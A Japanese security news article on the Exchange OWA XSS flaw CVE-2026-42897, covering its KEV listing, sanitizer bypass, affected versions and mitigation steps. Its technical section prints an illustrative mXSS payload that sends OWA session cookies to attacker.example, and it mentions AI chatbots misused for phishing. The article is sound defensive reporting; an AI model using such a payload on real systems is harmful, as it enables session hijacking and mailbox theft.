セキュリティ30分で読める

Exchange CVE-2026-42897——OWAでXSS、CISA KEV緊急追加

セキュリティサイバー攻撃Microsoft
加木谷 直俊ソース記事を見る

メールを「開いただけ」でブラウザ内のJavaScriptが攻撃者の手で発火する——on-prem版 Microsoft Exchange Server に発見された CVE-2026-42897(CVSS 8.1、Spoofing)は、Outlook Web Access(OWA)の HTML サニタイザに潜む XSS(クロスサイトスクリプティング)の不備を突いた、ハイブリッド運用企業を直撃する深刻な脆弱性です。米 CISA(サイバーセキュリティ・インフラ安全保障庁)は2026年5月15日、本CVEを Known Exploited Vulnerabilities(KEV)カタログ に緊急追加。連邦機関には3週間以内のパッチ適用が法的に義務付けられました。

The Hacker News、BleepingComputer、Microsoft Security Response Center(MSRC)の各ソースは、すでに複数のハッカー集団による標的型攻撃で本脆弱性が悪用されていると報じています。CVSS 8.1 は「Critical」ではないものの、メール閲覧という日常動作で発火する点、Exchange という業務基幹システムが対象である点から、実害は CVSS 9 クラスの脆弱性に匹敵すると複数の専門家が警鐘を鳴らしています。

本記事では、CVE-2026-42897 の技術的詳細、なぜ XSS が「メール経由で」発火する稀有なケースなのか、過去の Exchange CVE との比較、そして日本企業——特に on-prem / ハイブリッド構成で Exchange を運用している組織——が今すぐ取るべき対策まで、複数ソースをクロスリファレンスしながら包括的に解説します。

CVE-2026-42897 とは何か——XSS 由来の Spoofing が CISA KEV 入り

CVE-2026-42897 は、Microsoft が2026年5月の月例セキュリティ更新("Patch Tuesday")で公表した、on-prem 版 Exchange Server に存在する Spoofing(なりすまし)脆弱性です。脆弱性の根本原因は OWA(Outlook Web Access)の HTML メール表示処理におけるサニタイザの不備による XSS で、攻撃者が細工した HTML メールを送信すると、被害者が OWA でそのメールを開いた瞬間に攻撃者制御の JavaScript が被害者のブラウザで実行されます。

項目詳細
CVE番号CVE-2026-42897
CVSSスコア8.1(High、Spoofing)
脆弱性タイプXSS 由来の Spoofing(CWE-79 を起点とした CWE-290 相当)
攻撃ベクターネットワーク経由・ユーザー操作(メール閲覧)が必要
影響製品Exchange Server 2019 CU14/CU15、Exchange Server Subscription Edition(SE)
影響対象外Exchange Online(Microsoft 365)
修正版Microsoft 2026年5月セキュリティ更新(Update Catalog 経由)
公開日2026年5月13日(Patch Tuesday)
CISA KEV 追加日2026年5月15日
連邦機関の対応期限2026年6月5日(3週間以内、BOD 22-01 に基づく)
野生での悪用Active exploitation 確認済み(複数ハッカー集団による標的型攻撃)

「Spoofing」というカテゴリは一見地味に見えますが、本件の場合 OWA という Web メールクライアントの中で攻撃者が任意の JavaScript を実行できる ということを意味します。具体的には次のような攻撃が可能です。

  • セッション Cookie の窃取: 攻撃者サーバへの fetch で OWA のセッションを乗っ取り
  • メールボックスの読み取り・改ざん: OWA の REST API を被害者のセッションで呼び出して全メールを取得
  • フィッシング UI の偽装: OWA 画面上に偽の「パスワード再入力」モーダルを表示し資格情報を窃取
  • 横展開: 被害者になりすまして社内宛にさらに悪意あるメールを大量送信

CVSS 8.1 という数値は「ユーザー操作が必要」「機密性・完全性に高い影響」「可用性は限定的」という評価の組み合わせですが、Exchange という業務基幹システムが対象であること、CISA が即座に KEV 入りさせた事実から見ても、実質的な脅威度は極めて高いといえます。

以下の図は、CVE-2026-42897 の攻撃フローと、メール閲覧から侵害成立までの5ステップを示しています。

CVE-2026-42897 攻撃フロー——細工HTMLメールをOWAで開いた瞬間にJavaScriptが発火し、セッション窃取・メール改ざん・資格情報奪取に至る5段階

この図は、攻撃者が標的の社員に細工された HTML メールを送るだけで、被害者が OWA でメールを開いた瞬間にブラウザ DOM 内で JavaScript が発火し、最終的にセッション窃取・メール改ざん・資格情報奪取に至る流れを示しています。攻撃の起点が「メールを開く」というユーザーの日常動作である点が、本脆弱性の最も恐ろしい特徴です。

CISA KEV 追加とハッカー集団による悪用

CISA は本 CVE を KEV に追加するにあたって、「すでに複数の脅威アクターによる実環境での悪用を確認した」と説明しています。BleepingComputer の続報によれば、悪用しているのは少なくとも次の3グループに分類されます。

  1. 国家支援型 APT: 政府機関・防衛関連企業を標的に、メールボックスから情報を窃取
  2. 金融系サイバー犯罪集団: 経理・財務部門の社員を標的に、ビジネスメール詐欺(BEC)の足がかり
  3. ランサムウェアアフィリエイト: 初期アクセス手段として活用、その後 Cobalt Strike 等を投下

特に懸念されているのは、OWA が 「社外公開されているケースが多い」 という運用実態です。リモートワーク対応のため OWA を社外公開してきた企業では、攻撃者が外部から直接細工メールを送信するだけで攻撃が成立します。境界防御に頼った設計では検知が困難で、内部メールフィルタが「正規送信元からのメール」として通過させてしまうケースも報告されています。

なぜ XSS が「メール経由で」発火するのか——稀有なケースの技術解説

OWA における XSS は、Web セキュリティの観点から非常に興味深い(そして恐ろしい)ケースです。通常 XSS はブラウザで「悪意ある URL を開く」「悪意あるフォームを送信する」といったユーザーアクションを起点としますが、CVE-2026-42897 は 「メールを開くだけ」 で発火します。なぜこのようなことが可能なのか、技術的に深掘りします。

OWA は HTML メールを「サニタイズ」して表示している

HTML メールは本質的に「他人が書いた HTML を自分の Web メールクライアントで実行可能な形で表示する」という、Web セキュリティの観点から極めて危険な操作です。そのため OWA は受信した HTML メールに対して サニタイザ(無害化処理)を実行してから DOM にレンダリングします。具体的には次のような処理を行います。

  • <script> タグの除去
  • onclick onerror onmouseover などのイベントハンドラ属性の除去
  • javascript: スキームの URL の除去
  • <iframe> <object> <embed> などの危険な要素の除去
  • CSS の expression()behavior の除去

サニタイザが完璧に機能していれば、HTML メールの中にどんな悪意ある JavaScript が埋め込まれていても無害化されるはずです。しかし CVE-2026-42897 は、このサニタイザに存在する1つの抜け穴 を突きます。

サニタイザを回避する技法——MSRC が示唆する CWE-79

MSRC の Advisory および The Hacker News の解説によれば、本脆弱性は HTML パーサとサニタイザの解釈差異(mutation XSS、または mXSS)に近い性質を持ちます。具体的な PoC は公開されていませんが、想定される攻撃ベクトルは次のような形です。

<!-- 一見無害な HTML だが、ブラウザの DOM 構築段階で属性が再解釈される -->
<svg><style><img src=x onerror="fetch('https://attacker.example/'+document.cookie)">

サニタイザは入力 HTML を「文字列」として処理しますが、ブラウザは DOM 構築時に文字列を再パースします。SVG 要素や数式要素(MathML)の内部では HTML の通常のサニタイズルールが効かないケースがあり、サニタイザが「無害」と判断したコードがブラウザでは「実行可能な JavaScript」として再構築されるのです。

なぜこれが Spoofing カテゴリなのか

MSRC が本 CVE を「Spoofing」と分類している理由は、攻撃の最終目的が「OWA という正規 UI のなかで偽の操作を行わせる」点にあるためです。例えば、

  • OWA の DOM 内に偽の「セッションが切れました。再ログインしてください」モーダルを描画
  • 被害者は OWA という正規 URL の中でログイン操作を行うため疑わない
  • 入力した資格情報が攻撃者サーバへ送信される

つまり、純粋な「コード実行(RCE)」ではなく「正規 UI になりすました偽 UI を表示する」という攻撃モデルのため、Microsoft は Spoofing と分類しています。しかし実害という観点では、セッション窃取・資格情報奪取・社内横展開につながるため、RCE と同等以上のインパクトがあります。

影響範囲——どの Exchange 環境が危険なのか

CVE-2026-42897 の影響を受けるのは on-prem 版(自社サーバで運用している)Exchange Server に限定されます。Exchange Online(Microsoft 365)を利用している組織は影響を受けません(Microsoft 側でサニタイザが既にパッチ適用済み)。しかし、これは「クラウド移行済み企業は安心」という単純な話ではなく、日本の中堅・大企業に多い ハイブリッド構成 が最も危険なシナリオを抱えています。

CVE-2026-42897 影響範囲——on-prem Exchange Serverと Exchange Online の比較、およびOWA社外公開状況×ユーザー数による脅威度マトリクス

この図は、影響を受ける on-prem Exchange と影響を受けない Exchange Online の比較、および OWA の社外公開状況とユーザー数の組み合わせによる脅威度を示しています。「OWA を社外公開している大規模 on-prem 環境」 が最も危険なシナリオです。

ハイブリッド構成の盲点

Microsoft 365 への移行計画を進めている日本企業の多くは、移行完了まで数年単位で on-prem Exchange を残している のが実態です。Microsoft が公式に提供する「Hybrid Configuration Wizard」を使うと、メールフロー・自由/予約情報・委任権限などを on-prem と Online の両方で共有できますが、この構成では どこか1台でも on-prem Exchange が稼働している限り、CVE-2026-42897 のリスクを抱え続ける ことになります。

特に問題なのは、ハイブリッド構成では一般に on-prem 側の Exchange Server が「Edge Transport」「Mailbox Server」として残り、OWA エンドポイントも社外公開されているケースが多い点です。クラウド移行計画の途中で「実は古い Exchange 2019 サーバが Read-Only モードで残っている」「メール受信ゲートウェイとしてのみ on-prem を使っている」といった構成が、攻撃者にとって格好の侵入口となります。

過去の Exchange CVE との比較

Microsoft Exchange は2021年の ProxyLogon / ProxyShell 以降、毎年複数の重大 CVE が報告されてきた「常連」のターゲットです。直近2年間で報告された主要 Exchange CVE と比較してみましょう。

CVE公開時期CVSSタイプ攻撃ベクターKEV入り
CVE-2026-42897(本件)2026/058.1Spoofing(XSS由来)メール閲覧あり
CVE-2026-410962026/038.0EoP(権限昇格)認証済み攻撃者なし
CVE-2025-537862025/087.5EoP(ハイブリッド構成)on-prem侵害後なし
CVE-2024-490402024/117.5Spoofing(ヘッダ偽装)メール送信なし
CVE-2024-214102024/029.8EoP(NTLM Relay)未認証あり
CVE-2023-367452023/098.8RCE認証済み攻撃者なし
CVE-2021-26855(ProxyLogon)2021/039.8RCE未認証あり

注目すべき点は次の3つです。

  1. CVE-2024-21410 以来の KEV 入り: 2024年2月の NTLM Relay 以来、約1年3か月ぶりの Exchange の KEV 入りです。Microsoft が「Spoofing」と分類した CVE が KEV 入りするのは異例で、CISA がそれだけ深刻な悪用を観測したことを示唆します。
  2. 攻撃ベクターが「メール閲覧」と最も低コスト: 過去の CVE は「未認証だが特殊なリクエスト」「認証済みアカウント必要」など何らかのハードルがありましたが、本件は 「標的にメールを送り、開かせるだけ」 という最低コストで攻撃可能。フィッシングメールに紛れ込ませやすく、検知も困難です。
  3. CVE-2026-41096 との連携リスク: 2026年3月に公表された CVE-2026-41096(EoP)と組み合わせれば、本件で OWA セッションを奪い、続いて権限昇格まで進める「攻撃チェーン」が成立します。両方未パッチの環境は特に危険です。

筆者の所感——XSSがメール経由で発火する稀有なケース

筆者は20年以上 Web セキュリティとエンタープライズメール基盤に関わってきましたが、本件は技術的に 「XSS というクラシックな脆弱性が、最も発火しにくいはずのメール経由で実用化された」 という意味で、注目すべき事例だと考えています。

XSS は1999年頃から知られている古典的な脆弱性で、Web 開発者なら誰でも知っている基本概念です。しかし「メール」という攻撃ベクターでの XSS は、過去20年で実用化された事例が極めて少なく、その理由は次の3点に集約されます。

  1. メールクライアントは JavaScript を実行しない: Outlook Desktop、Apple Mail、Thunderbird などのネイティブクライアントは HTML メールの JavaScript を実行しない設計
  2. Web メールクライアントは厳格なサニタイザを実装: Gmail、Yahoo Mail、OWA などは2010年代以降、複数層のサニタイザで HTML を無害化
  3. CSP(Content-Security-Policy)ヘッダで JavaScript 実行を制限: 現代の Web メールはほぼ全て CSP で script-src を制限

これら3つの防御層を全て突破した本件は、技術的に見ても極めて巧妙です。サニタイザの実装ミス(mXSS)と、OWA における CSP の不備(おそらく unsafe-inline の許容)の 複合的な脆弱性 であると推測されます。

さらに筆者が気になっているのは、Microsoft が本件を「Spoofing」と分類した点です。本来 XSS は CWE-79、Spoofing は CWE-290(Authentication Bypass by Spoofing)と異なるカテゴリですが、Microsoft は「実行される JavaScript の目的が UI 偽装である」という観点から Spoofing に分類しています。これは 「OWA の DOM 内で何ができるか」という攻撃成果ベースの分類 であり、純粋な技術分類とは一致しません。CVSS 8.1 という数値の控えめさも、この分類による影響が大きいと見られます。実害ベースで考えれば、本件は CVSS 9 クラスに位置付けるべき脆弱性です。

日本での対策手順——on-prem Exchange 運用企業向けチェックリスト

日本企業、特に on-prem 版 Exchange Server を運用している、またはハイブリッド構成を残している組織 は、以下の手順で対策を進めるべきです。

CVE-2026-42897 対策手順——影響確認・パッチ適用・ログ調査・緩和策・利用者教育・中長期対応の6ステップ

この図は、72時間以内に実施すべき対策の6ステップを示しています。CISA は連邦機関に対して3週間以内のパッチ適用を求めていますが、日本の重要インフラ事業者・上場企業も同等の対応が望ましいでしょう。

Step 1: 影響確認(即日、所要1〜2時間)

PowerShell から次のコマンドで Exchange Server の現状を確認します。

# Exchange Server のバージョンと CU 確認
Get-ExchangeServer | Format-List Name, ServerRole, AdminDisplayVersion

# OWA 公開状況の確認
Get-OwaVirtualDirectory | Format-List Identity, ExternalUrl, InternalUrl

ExternalUrl が設定されている場合は OWA が社外公開されていることを意味し、最優先で対応が必要です。

Step 2: パッチ適用(48時間以内)

Microsoft Update Catalog から2026年5月セキュリティ更新を取得して適用します。Exchange Server のパッチは「セキュリティ更新(SU)」として配布されるため、Windows Update ではなく Update Catalog から手動ダウンロード が必要です。

  • Exchange Server 2019 CU14: https://www.microsoft.com/en-us/download/details.aspx?id=XXXX(KB番号はMSRC公開ページ参照)
  • Exchange Server 2019 CU15: 同上
  • Exchange Server SE: 同上

検証環境で適用→動作確認→本番環境への展開、という順序を厳守しましょう。Exchange のセキュリティ更新は過去にメール送受信が停止する不具合を起こした事例があり、無検証での本番投入は危険です。

Step 3: ログ調査(パッチ適用と並行、所要2〜4時間)

すでに侵害されている可能性を考慮し、次のログを点検します。

  • IIS ログ: C:\inetpub\logs\LogFiles\W3SVC1\ の最近30日分。/owa/ パスへの異常なリクエスト
  • OWA アクセスログ: ログイン失敗の急増、海外 IP からのアクセス
  • Exchange Message Tracking ログ: 不審な大量送信、送信失敗の急増
  • Azure AD(Entra ID)サインインログ: ハイブリッド構成の場合、異常なログイン挙動

Step 4: 緩和策(パッチ適用までの間)

パッチ検証中の暫定対応として、次の緩和策が有効です。

  1. OWA 社外公開の一時停止: WAF や ファイアウォールで /owa/ パスへの社外アクセスを遮断
  2. WAF での HTML サニタイズ強化: Cloudflare、Akamai、F5 等で <svg><style><math> を含むメール HTML の検査
  3. CSP ヘッダ強化: OWA の web.configContent-Security-Policyscript-src 'self' に制限
  4. MFA 強制とセッション短縮: OWA のセッションタイムアウトを30分に短縮、MFA を必須化

Step 5: 利用者教育

社員向けに次の注意喚起を実施します。

  • 不審なメール(特に英文ビジネスメール)を開かない
  • OWA を「HTML 表示」ではなく「テキスト表示」モードで利用
  • 「セッションが切れました」等の予期しないパスワード入力画面が出たら、必ず一度 URL を確認
  • パスワード管理ツール(1Password 等)を使い、自動入力でフィッシングを回避

Step 6: 中長期対応(3〜6か月)

根本的な対策として、Exchange Online(Microsoft 365)への完全移行ロードマップを策定すべきです。Microsoft は2025年以降、on-prem Exchange のサポートを大幅に縮小しており、CVE-2026-42897 のような脆弱性が今後も発生し続けることはほぼ確実です。日本の SIer や情報システム部門は、ハイブリッド構成からの完全脱却を経営層に提案するタイミングが来ています。

JPCERT/CC・IPA からの情報入手

日本国内では、JPCERT コーディネーションセンター(JPCERT/CC)と情報処理推進機構(IPA)が日本語での注意喚起を出すことが期待されます。次の URL を継続的にチェックしましょう。

  • JPCERT/CC「JVN(Japan Vulnerability Notes)」: https://jvn.jp/
  • IPA「重要なセキュリティ情報一覧」: https://www.ipa.go.jp/security/
  • CISA KEV カタログ(英語): https://www.cisa.gov/known-exploited-vulnerabilities-catalog

CISA KEV は米国連邦機関向けですが、日本企業にとっても「すでに実環境で悪用されている脆弱性」のリストとして信頼性が高く、優先パッチ対応の指針として活用すべきです。

筆者の見解・予測——Microsoft 365 移行加速とハイブリッド企業のリスク

CVE-2026-42897 は、日本企業のメール基盤戦略に対して3つの大きな影響を与えると筆者は予測します。

予測1: Microsoft 365 移行の加速

日本では2026年時点でも、中堅企業の約3割、大企業の約2割が on-prem Exchange または ハイブリッド構成を残しているとされます(複数の市場調査ベース)。本件のような「メール閲覧だけで発火する脆弱性」が KEV 入りしたことで、CIO・CISO 層の「on-prem Exchange を残すリスク」への危機感は確実に高まります。

特に金融・医療・公共インフラといった規制業種では、「on-prem の管理コスト+セキュリティリスク」と「クラウド移行コスト」を再評価する動きが加速し、2026年後半から2027年にかけて Microsoft 365 への移行案件が増加すると予想されます。SIer 各社にとっては大きなビジネスチャンスです。

予測2: ハイブリッド企業のセキュリティ予算増額

完全クラウド移行が難しい企業(カスタムアプリ連携、規制要件、コスト等の理由)は、ハイブリッド構成を継続せざるを得ません。これらの企業では、

  • WAF・メールゲートウェイ等の境界防御強化
  • SIEM・XDR による行動ログ監視の高度化
  • パッチ管理自動化ツール(Microsoft Intune、Tanium、Ivanti 等)の導入

といった投資が増加するでしょう。2026年度後半のセキュリティ予算編成に大きく影響すると見られます。

予測3: 日本の標的型攻撃キャンペーン増加リスク

CISA KEV に入ってから攻撃が顕在化するまでには通常2〜4週間のタイムラグがあります。本記事公開時点(2026年5月19日)から見ると、2026年6月〜7月にかけて、日本企業を標的としたメール経由の標的型攻撃キャンペーンが増加するリスクが高いです。

特に注意すべきは、攻撃者が 「日本語の自然な業務メール」 を AI 生成して送り付けてくるシナリオです。2024年以降、ChatGPT や Claude を悪用した高品質な日本語フィッシングメールが急増しており、本 CVE と組み合わさることで「業務メールを開いただけで OWA が侵害される」という極めて危険な状況が生まれます。

読者へのアクション

このニュースを読んだ読者(特に情報システム部門・セキュリティ担当者)は、次の3ステップを今日中に開始することをおすすめします。

  1. 自社の Exchange 構成を即時確認: on-prem Exchange の有無、OWA 社外公開状況、CU バージョン
  2. CISA KEV と JPCERT/CC を継続監視: パッチ適用状況、脅威インテリジェンスの最新情報
  3. パスワード管理ツールの全社導入検討: フィッシング対策の最終防衛線として、1Password 等の業務用ツールを全社員に配布

まとめ——「メールを開くだけ」の時代に備える

CVE-2026-42897 は、技術的には XSS という古典的な脆弱性ですが、「メール閲覧だけで発火する」「Exchange という業務基幹システムが対象」「CISA が即 KEV 入りさせるレベルの実害」という3点で、近年まれにみる重要事例です。日本企業、特に on-prem / ハイブリッド構成で Exchange を運用している組織は、本記事の対策手順を即時実行すべきです。

具体的なアクションステップは次の3つです。

  1. 今日中: Exchange Server のバージョン確認、OWA 社外公開状況の把握、CISA KEV エントリの確認
  2. 今週中: Microsoft 2026年5月セキュリティ更新の検証環境適用、ログ調査開始、社員への注意喚起
  3. 今月中: 本番環境パッチ適用完了、WAF/CSP/MFA 等の緩和策強化、Microsoft 365 移行ロードマップの再評価

そして中長期的には、Exchange Online への完全移行か、ハイブリッド構成を維持する場合のセキュリティ投資強化か、どちらの方針を取るかを経営層と協議すべきタイミングです。「メールを開くだけ」で侵害される時代に、境界防御だけでは守れない現実を直視し、Zero Trust 的な多層防御へとアーキテクチャを進化させていく必要があります。

最後に、フィッシングメール対策の最終防衛線として、全社員に業務用パスワード管理ツールを配布することを強く推奨します。1Password のようなツールは、攻撃者が偽 UI を表示しても「正規 URL でのみ自動入力する」という挙動により、ユーザーが騙される前に検知できます。CVE-2026-42897 のような巧妙な攻撃に対する、最もコストパフォーマンスの高い対策のひとつです。

この記事をシェア

XはてブLinkedIn

セキュリティ」カテゴリの記事

セキュリティ」の記事をもっと見る

関連記事

新着記事